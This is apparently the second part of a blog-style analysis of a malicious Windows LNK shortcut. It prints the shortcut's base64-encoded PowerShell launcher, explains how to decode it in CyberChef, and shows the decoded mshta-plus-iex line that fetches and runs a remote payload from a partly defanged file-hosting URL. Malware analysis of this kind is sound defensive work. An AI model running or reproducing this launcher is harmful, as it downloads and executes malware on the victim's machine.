Analysis Malicious LNK Part 2

In this article we will start the second part of analyzing a malicious LNK file and try to analyze the code in the simplest way.

Sample Link : https://bazaar.abuse.ch/sample/c07eddc933da41c6569168e02938857fc3964b36b3a95bd5df897d5a4482c961/

Malicious LNK Screenshot:

Malicious LNK Structures Analysis:

1- Target: is appear that contain a long powershell code that try to execute a malicious stripped powershell codes .

Malicious Powershell code analysis ( Inside Target Section in LNK File look Image upper ) :

1- Malicious Powershell Code : %WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBzAF4AaAB0AGEAIABeAF4AaAB0AF4AdABeAHAAcwA6AC8ALwBzAF4AXgBeAHQAXgBeAF4AbwBeAF4AcgBeAF4AXgBlAF4ANgAuAGcAbwBeAF4AXgBmAF4AXgBeAGkAbABlAF4ALgBpAG8ALwBeAF4AZABvAHcAXgBeAG4AXgBeAF4AbABvAF4AYQBkAC8AZABeAF4AXgBpAF4AcgBeAGUAYwBeAF4AdAAvAGIAMAA4AF4AXgBeAGUAXgBeAGEANwA5AF4AXgA2AC0AMgBeAF4AYwAwAGIALQBeAF4AXgA0AF4AXgBeAF4AMQBeAF4AXgAyAF4AZgBeAF4AXgBeAC0AXgBeAF4AYgBkAF4AXgBeAF4AOABeAF4AXgBeADgAXgBeAF4ALQBeAF4AXgBeADcAYgAxAF4AXgBeAGMAXgBeAF4ANgA1AGUAXgBeAF4AMwBeAF4ANgBeAF4AXgBeAGIAOQBeAF4AXgBeAGUALwBeAF4AXgBWAGUAXgBeAHIAXgBeAGwAZQBeAF4AXgBnAHUAXgBuAF4AXgBeAGcALgBtAF4AXgBeAF4AcABeAF4AXgBeADQAXgBeAF4AXgBeAF4AXgAnAC4AcgBlAHAAbABhAGMAZQAoACcAXgAnACwAJwAnACkAOwBpAGUAeAAgACgAZwBjAGIAKQA=

2- Malware Developer try to execute a Encoded Malicious Powershell Code : %WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe powershell -E

3- Encoded Base64 Malicious Code : cwBjAGIAIAAnAF4AbQBzAF4AaAB0AGEAIABeAF4AaAB0AF4AdABeAHAAcwA6AC8ALwBzAF4AXgBeAHQAXgBeAF4AbwBeAF4AcgBeAF4AXgBlAF4ANgAuAGcAbwBeAF4AXgBmAF4AXgBeAGkAbABlAF4ALgBpAG8ALwBeAF4AZABvAHcAXgBeAG4AXgBeAF4AbABvAF4AYQBkAC8AZABeAF4AXgBpAF4AcgBeAGUAYwBeAF4AdAAvAGIAMAA4AF4AXgBeAGUAXgBeAGEANwA5AF4AXgA2AC0AMgBeAF4AYwAwAGIALQBeAF4AXgA0AF4AXgBeAF4AMQBeAF4AXgAyAF4AZgBeAF4AXgBeAC0AXgBeAF4AYgBkAF4AXgBeAF4AOABeAF4AXgBeADgAXgBeAF4ALQBeAF4AXgBeADcAYgAxAF4AXgBeAGMAXgBeAF4ANgA1AGUAXgBeAF4AMwBeAF4ANgBeAF4AXgBeAGIAOQBeAF4AXgBeAGUALwBeAF4AXgBWAGUAXgBeAHIAXgBeAGwAZQBeAF4AXgBnAHUAXgBuAF4AXgBeAGcALgBtAF4AXgBeAF4AcABeAF4AXgBeADQAXgBeAF4AXgBeAF4AXgAnAC4AcgBlAHAAbABhAGMAZQAoACcAXgAnACwAJwAnACkAOwBpAGUAeAAgACgAZwBjAGIAKQA=

Decoding Malicious Base64 Encoded Powershell Code :

1- Open CyberChef in your web browser .

2- Paste the Encoded Malicious base64 Powershell code .

3- From the Operations field select from base64 or double click on it .

4- Then From the Operations field select Remove Null Bytes .

If we look the output after decoding it look like still in some symbolic way obfuscated to deobfuscate this symbolics obfuscation method .

Decoding Symbolic Obfuscated Code :

1- Do not clear your recent operations for decoding Malicious Base64 Encoded Powershell Code .

2- Again in operations search for Find/Replace Operations .

3- From Find Paste this ( ^ ) and keep the replace empty .

4- You can also deobfuscate manually .

Result : scb 'mshta https:[//]store6.gofile].io/]download/direct/b08ea796-2c0b-412f-bd88-7b1c65e36b9e/Verlegung[.mp4']; iex (gcb)

Reverse The Malware

Analysis Malicious LNK Part 2

Comments

Post a Comment